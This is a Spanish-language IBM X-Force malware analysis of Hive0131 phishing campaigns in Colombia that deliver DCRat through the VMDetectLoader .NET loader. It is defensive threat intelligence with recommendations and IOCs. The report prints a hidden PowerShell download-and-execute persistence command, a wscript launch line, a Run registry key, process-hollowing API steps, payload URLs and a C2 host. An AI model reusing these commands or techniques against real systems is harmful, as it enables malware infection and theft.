Etiquetas
Seguridad

Análisis de amenazas de IBM X-Force: Crece la presencia de DCRat en América Latina

Una mano escribe en una computadora portátil con un escudo de seguridad rojo y gráficos de correo electrónico sobre el teclado

A principios de mayo de 2025, IBM X-Force observó que Hive0131 llevaba a cabo campañas de correo electrónico dirigidas a usuarios de Colombia con notificaciones electrónicas de procedimientos penales, que pretendían provenir del Poder Judicial de Colombia. Hive0131 es un grupo motivado financieramente, probablemente originario de América del Sur, que realiza campañas de forma rutinaria en gran medida en América Latina (LATAM) para ofrecer una amplia gama de cargas útiles de productos básicos. Las campañas actuales imitan la correspondencia oficial y contienen un enlace incrustado o un señuelo PDF con un enlace incrustado. Al hacer clic en el enlace incrustado, se iniciará la cadena de infección para ejecutar el troyano bancario "DCRat" en la memoria. 

DCRat funciona como malware como servicio (MaaS), apareció por primera vez al menos en 2018 y se anuncia mucho en los foros rusos de delitos cibernéticos, que se pueden comprar por alrededor de 7 USD por una suscripción de dos meses. La presencia de DCRat es generalizada y se ha vuelto cada vez más popular en LATAM desde al menos 2024. Durante el verano de 2024, X-Force observó varias campañas dirigidas principalmente a entidades en Colombia, todas imitando a una compañía LATAM especializada en ecosistemas de documentos electrónicos en México y Colombia. Sin embargo, dadas las diferencias en la cadena de infección y la entrega de DCRat, X-Force evalúa que las campañas de 2024 y actuales fueron realizadas por diferentes actores. Las campañas observadas en 2024 dependían en gran medida de archivos RAR protegidos por contraseña que contenían NSIS para ejecutar un descargador de GuLoader, mientras que estas campañas recientes dependen de un cargador .NET ofuscado al que llamamos VMDetectLoader. 

Capacidades DCRat

  • Omite AMSI
  • Detecta entornos de análisis
  • Elimina los procesos bloqueados
  • Obtiene persistencia a través de una tarea programada o clave de registro
  • Escucha los comandos de un servidor de comando y control (C2)

DCRat viene con complementos que son capaces de realizar las siguientes tareas, aunque los actores de amenazas pueden crear complementos personalizados para realizar tareas adicionales:

  • Grabar a una víctima a través del micrófono o la cámara de la computadora
  • Subir y descargar archivos
  • Ejecución de comandos
  • Obtener de información del sistema
  • Cifrar y descifrar archivos
  • Editar claves de registro
  • Registrar pulsaciones de teclas y datos del portapapeles
  • Manipular el sistema de archivos

Tipo de amenaza

MaaS

Hombre mirando una computadora

Fortalezca su inteligencia de seguridad  

Adelántese cada semana a las amenazas con novedades e información sobre seguridad, IA y más con el boletín Think.  

Análisis

A principios de mayo de 2025, X-Force observó campañas de correo electrónico Hive0131 que imitaban a la Rama Judicial de Colombia, que pretendía ser del Circuito Civil de Bogotá, Colombia, para enviar notificaciones electrónicas de procesos penales. Las campañas observadas contienen un señuelo PDF con un enlace a una TinyURL o contienen un enlace incrustado a una ubicación de Google Docs. 

Descripción general de la cadena de infección - PDF con TinyURL

Para los correos electrónicos que contiene un señuelo PDF que conduce a un tinyurl, la víctima es redirigida a un archivo postal llamado 1Juzgado 08 Civil Circuito de Bogotá Notificación electrónica Orden de Embargo.Uue. El archivo ZIP contiene archivos benignos, así como un archivo JavaScript malicioso llamado 1Juzgado 08 Civil Circuito de Bogotá Notificación electrónica Orden de Embargo.js. El archivo JavaScript descarga una carga útil de JavaScript de un sitio paste[.]ee y lo ejecuta. Luego, esta carga útil ejecuta un comando de PowerShell que descarga un JPG de hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg con un cargador codificado en base64 adjunto al final del archivo. Una vez ejecutado, el cargador descarga y ejecuta DCRat en la memoria.

El cargador recibe el nombre de VMDetectLoader debido a su capacidad para determinar si se está ejecutando en un entorno de sandbox. El análisis indica que el cargador se basa en el proyecto de código abierto https://github.com/robsonfelix/VMDetector.

Cadena de infección RAMA
Figura 1: Cadena de infección de RAMA
Ejemplo de correo electrónico con señuelo PDF
Figura 2: Ejemplo de correo electrónico con señuelo PDF

Resumen de la cadena de infección: enlace integrado a Google Docs.

Esta cadena de infección se inicia con correos electrónicos de phishing que contienen un enlace a una descarga de Google Docs de un archivo ZIP protegido con contraseña llamado CUI 158616000129-2025-10047_122011111777.zip, cuya contraseña se encuentra en el correo electrónico y es 3004. El archivo contiene un descargador de archivos por lotes, CUI 158616000129-2025-10047_122011111777.bat, que descarga y ejecuta un componente ofuscado de VBScript (VBS) dehxxp://paste[.]ee/d/jYHEqBJ3/0  a %WinDir%\Temp\Pernambuco.vbs. Posteriormente, el script VBS decodifica y ejecuta un script PowerShell codificado en base64 que descarga VMDetectLoader a través de un archivo JPG desdehxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg .
A continuación, VMDetectLoader descarga la carga útil final mediante un archivo de pega [.] ee URL pasada por el script de PowerShell.

Cadena de infección de RAMA con Google Docs
Figura 3: Cadena de infección de RAMA con Google Docs
Ejemplo de correo electrónico con enlace a Google Docs
Figura 4: Ejemplo de correo electrónico con enlace a Google Docs

VMDetectLoader

VMDetectLoader es un cargador .NET ofuscado (Microsoft.Win32.TaskScheduler.dll) que se puede encontrar en VirusTotal en https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7. El análisis de los metadatos del cargador indica que el código se basa en el proyecto de código abierto https://github.com/robsonfelix/VMDetector.

Atributos del ensamblaje:

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

Antes de cargar la carga útil, el cargador detecta máquinas virtuales e imprime una lista de atributos de host en la consola si se detecta una VM. Por ejemplo:

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

Funcionalidad

VMDetectLoader se ejecuta a través de su función dnlib.IO.Home.VAI()  fy datos transmitidos similares a los siguientes. Esta información puede variar según la campaña.

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

Argumento

Descripción

$storeman

 URL de Pastee invertida desde la que se descarga una carga útil codificada en base64. 

MSBuilld

 Proceso de inyección por objetivos

C:\Users\Public\Downloads
rhabdosteus
js

 Ruta utilizada para crear una tarea programada: 

C:\Users\Public\Downloads\rhabdosteus.js

1

 Indicador que señala verificaciones de procesos.

bimetalismo

 Nombre de la tarea programada

Durante la ejecución, VMDetectLoader, XOR descifra cadenas notables según sea necesario del recurso .NET "hIXS".

Una muestra de cadenas descifradas dentro de carpetas

Muestras de cadenas descifradas

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

Persistencia

Si se configura para hacerlo, se crea una tarea programada para ejecutar el siguiente comando de PowerShell que descarga y ejecuta una carga útil de JavaScript:

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

Se puede crear otra tarea, si está configurada, para ejecutar la carga útil de JavaScript mediante el siguiente comando:

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

El cargador también puede crear una clave de ejecución del Registro para ejecutar la carga útil:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

Inyección de proceso

VMDetectLoader tiene la capacidad de utilizar la técnica de inyección de vaciado de procesos para cargar una carga útil en diferentes instancias de proceso de destino. Por ejemplo, para la campaña analizada, C:\Windows\Microsoft.NET\infraestructura\v4.0.30319\MSBuild.exe (32 bits) o C:\Windows\Microsoft.NET\infraestructura64\v4.0.30319\MSBuild.exe (64 bits) es el proceso de destino. La función responsable de la inyección del proceso se denomina HackForums.gigajew.x64.Load() para las muestras de 64 bits y dnlib.IO.Tools.Ande() para las muestras de 32 bits.

Proceso de inyección de vaciado:

  1. Crear un proceso suspendido mediante CreateProcess() con dwCreationFlags establecido en CREATE_SUSPENDED (4).
  2. Desasignar la memoria en el proceso de destino mediante ZwUnmapViewOfSection().
  3. Asignar nueva memoria en el proceso de destino mediante VirtualAllocEx().
  4. Escribir la carga útil en la memoria recién asignada mediante WriteProcessMemory().
  5. Actualizar el punto de entrada del proceso utilizando GetThreadContext() y  SetThreadContex().
  6. Ejecutar ResumeThread() para ejecutar el código.

DCRat

Si VMDetectLoader determina que está funcionando en un entorno seguro, la carga útil final se carga mediante hollowing de procesos. En este caso, la carga útil final es DCRat con los siguientes datos de configuración.

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

Conclusión

X-Force rastrea varios grupos que operan en el panorama de amenazas de América Latina que realizan campañas de correo electrónico que entregan MaaS con el fin de obtener ganancias financieras. Entre los grupos rastreados se encuentran Hive0148 y Hive0149, que se centran en la entrega del troyano bancario Grandoriero, Hive0153 que entrega el malware Adwind y SambaSpy, y Hive0131. Aunque Hive0131 normalmente se centra en operaciones con la entrega de malware como QuasarRAT y NjRAT, X-Force ha observado un aumento en las campañas que involucran a DCRat. Con la observancia constante y continua del malware entregado a los usuarios dentro de LATAM, IBM X-Force evalúa que América Latina Continuará enfrentar ataques de actores de amenazas que buscan desplegar troyanos bancarios mediante campañas de phishing para obtener credenciales y otra información sensible.

Recomendaciones

Se recomienda a las entidades de LATAM que tengan cuidado con los correos electrónicos que contengan archivos adjuntos, enlaces o que contengan instrucciones para descargar archivos. Además, se recomienda a las entidades realizar lo siguiente:

  • Tener cuidado con los correos electrónicos que contengan enlaces o instrucciones de descarga
  • Monitorear la evidencia basada en el host de inyección de procesos, creación de procesos fraudulentos, creación de tareas programadas y modificaciones en el registro
  • Instalar, actualizar y configurar el software de seguridad endpoint
  • Monitoree las reglas de los endpoints
  • Buscar el bypass de la política de ejecución

Indicadores de compromiso

Indicador

 Tipo de indicador

  Contexto

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

 SHA256

 Carrier File 

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

 SHA256

 ZIP Archiv

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

 SHA256

 DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

 SHA256

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

 SHA256

 Cargador .NET ofuscado

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

 SHA256

 ZIP Archiv

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

 SHA256

 PS Script

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
DE106B3D5491372CCF

 SHA256

 PS Script

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

 SHA256

 Descargador de scripts por lotes

hxxps://tinyurl[.]com/2ypy4jrz?ID=5541213d-0ED8
-4516-82e7-5460d4ebaf3b

 URL

 Enlace PDF incrustado

hxxp://paste[.]EE/D/BX699SF9/0

 URL

 URL de descarga de la carga útil

hxxps://docs[.]Google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

 URL

 Enlace de correo electrónico incrustado

hxxp://paste[.]ee/d/jYHEqBJ3/0

 URL

 URL de descarga de la carga útil

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

 URL

 URL de descarga JPG

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

   URL

 URL de descarga JPG

IBM X-Force Premier inteligencia de amenazas está ahora integrado con OpenCTI, lo que ofrece inteligencia de amenazas procesable sobre esta actividad de amenazas y más. Acceda a insights sobre actores de amenazas, malware y riesgos de la industria. Instale el OpenCTI Connector para mejorar la detección y la respuesta, fortaleciendo su ciberseguridad con la experiencia de IBM X-Force. Manténgase a la vanguardia:integre hoy mismo.

Mixture of Experts | 12 de diciembre, episodio 85

Decodificación de la IA: Resumen semanal de noticias

Únase a nuestro panel de ingenieros, investigadores, responsables de producto y otros profesionales de talla mundial que se abren paso entre el revuelo de la IA para ofrecerle las últimas noticias e insights al respecto.
Vea todos los episodios de Mixture of Experts
Soluciones relacionadas
Servicios de gestión de amenazas

Predecir, prevenir y responder a las amenazas modernas, aumentando la resiliencia del negocio.

 

 Explore los servicios de gestión de amenazas
Soluciones de detección y respuesta a amenazas

Utilice las soluciones de detección y respuesta a amenazas de IBM para fortalecer su seguridad y acelerar la detección de amenazas.

 Explorar las soluciones de detección de amenazas
Soluciones de defensa contra amenazas móviles (MTD)

Proteja su entorno móvil con las soluciones integrales de defensa contra amenazas móviles de IBM MaaS360.

 Explore las soluciones de defensa frente a amenazas móviles
Dé el siguiente paso

Obtenga soluciones integrales de administración de amenazas, protegiendo de manera experta su negocio contra ataques cibernéticos.

 Explore los servicios de gestión de amenazas Reserve una sesión informativa centrada en las amenazas